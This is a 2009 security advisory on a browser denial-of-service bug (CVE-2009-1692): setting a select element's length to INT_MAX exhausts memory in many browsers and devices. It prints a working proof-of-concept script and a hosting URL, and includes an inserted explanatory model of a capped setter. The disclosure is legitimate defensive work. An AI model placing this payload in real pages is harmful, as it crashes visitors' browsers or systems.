
Advisories


One bug to rule them all - IE5, IE6, IE7, IE8, Netscape, Firefox, Safari, Opera, Konqueror, Seamonkey, Wii, PS3, iPhone, iPod, Nokia, Siemens... and more.


Reference : [GSEC-TZO-44-2009] - One bug to rule them all
CVE : CVE-2009-1692 (created by Apple; this bug has the same root cause)
Credit: Thierry Zoller

Affected products :

Patch status :

I. Background

Quoting Wikipedia "ECMAScript is a scripting language, standardized by Ecma International in the ECMA-262 specification and ISO/IEC 16262. The language is widely used on the web, especially in the form of its three best-known dialects, JavaScript, ActionScript, and JScript."

II. Description

Calling the select() method with a large integer results in the continuous allocation of x+n bytes of memory, exhausting memory after a while.

The impact varies from a null pointer dereference (no more memory, hence crashing the browser) to a reboot of the complete operating system (Konqueror on Ubuntu).

There had never been a limit specified as to how many HTML elements the select call should handle. After the report of this bug, vendors apparently agreed to a limit of 10,000 elements: "Talked to some Apple and Opera guys at the WHATWG social, and we decided this was a good number".
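To make the root cause and the agreed mitigation concrete, here is an added model of the select length setter; it is not code from the advisory or from any browser. The DOM is replaced by a plain array of option-like objects, MAX_SELECT_LENGTH is the 10,000-element limit quoted above (assumed here as a constant), and BYTES_PER_OPTION is an assumed per-node cost used only to illustrate the scale of the allocation a huge length requests.

```javascript
// Added example (not the advisory's PoC): model of the HTMLSelectElement.length
// setter, showing why an unbounded setter exhausts memory and how a cap bounds it.
// Assumed constants: the 10,000 limit from the advisory and a made-up per-node cost.
const MAX_SELECT_LENGTH = 10000;
const BYTES_PER_OPTION = 64;

// Stand-in for a <select>: its options live in a plain array instead of the DOM.
class ModelSelect {
  constructor() { this.options = []; }
  get length() { return this.options.length; }
}

// Unbounded setter: mirrors the pre-fix behaviour described in the advisory.
// Every missing option is allocated eagerly, so a request for 2^31-1 elements
// tries to build ~2 billion nodes in one go. Only safe to call with small n here.
function setLengthUnbounded(sel, n) {
  n = n >>> 0; // WebIDL "unsigned long" coercion: -1 becomes 4294967295
  while (sel.options.length > n) sel.options.pop();
  while (sel.options.length < n) sel.options.push({ tagName: 'OPTION', text: '' });
  return sel.options.length;
}

// Bounded setter: a request above the cap is ignored and the element is left
// unchanged, so the allocation can never exceed `max` nodes.
function setLengthBounded(sel, n, max = MAX_SELECT_LENGTH) {
  n = n >>> 0;
  if (n > max) return sel.options.length;
  return setLengthUnbounded(sel, n);
}

// Illustrative size of the allocation an uncapped setter would attempt.
function bytesRequested(n, bytesPerOption = BYTES_PER_OPTION) {
  return (n >>> 0) * bytesPerOption;
}

// Usage: the PoC value from the advisory against the capped model.
const demo = new ModelSelect();
setLengthBounded(demo, 2147483647);
console.log(`length after capped request: ${demo.length}`);
console.log(`uncapped request would ask for ~${bytesRequested(2147483647) / 2 ** 30} GiB`);
```

The cap is applied before any node is created, which is the property that matters: checking the requested length after allocating would still walk the browser into the out-of-memory condition the advisory describes.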

III. Impact

The impact varies from browser to browser and sometimes from OS to OS.

IV. Proof of concept

<script>
/* Creates one <select> and sets its length to INT_MAX a single time;
   the browser then attempts to allocate that many <option> nodes. */
function poc(o) {
    var e = document.createElement("select");
    e.length = 2147483647;
}

function go() {
    poc(0);
}
</script>

URL: http://www.crashthisthing.com/select.html

Some have not understood what this code does: it does NOT loop, as some vendors claimed; it sets select.length ONCE to a huge integer. One might wonder whether, over the last 9 years that this bug existed, nobody ever entered a large number in a select.length assignment.

V. Disclosure timeline

Nothing particular to note.

VI. Thanks
Chris Gates, FX, David Raison, Fahem Adam, a team of engineers that recognise themselves, oCert for not helping coordinate this bug.

VII. Media Coverage

Note: All trademarks mentioned herein belong to their respective owners.